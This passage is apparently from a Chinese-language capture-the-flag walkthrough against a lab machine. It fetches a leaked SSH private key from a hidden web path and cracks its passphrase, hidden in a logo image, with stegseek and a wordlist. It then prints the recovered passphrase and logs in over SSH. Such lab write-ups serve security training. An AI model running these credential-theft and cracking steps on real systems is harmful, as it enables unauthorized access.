然后,把这个私钥下载下来:
wget http://192.168.1.146/softyhackb4el7dshelldredd/id_rsa
这次登录试下!两个问题:
- too open需要将私钥的权限改为600
- 这个id_rsa需要密码
接下来,需要搞定这个rsa的密码!!!!
我们先把这个logo图片下下来!!!
wget http://192.168.1.146/logo.jpg
这里我们需要安装一个图片隐写工具:
https://github.com/RickdeJager/stegseek/releases/tag/v0.6
下载完:安装下:
dpkg -i stegseek_0.6-1.deb
安装过程中可能缺少部分组件:
apt --fix-broken install
安装完毕:采用先前的user.txt,对logo图片进行解密!
stegseek logo.jpg users.txt -xf output
这就是私钥的密码了!!
d4t4s3c#1
ssh -i id_rsa hmv@192.168.1.146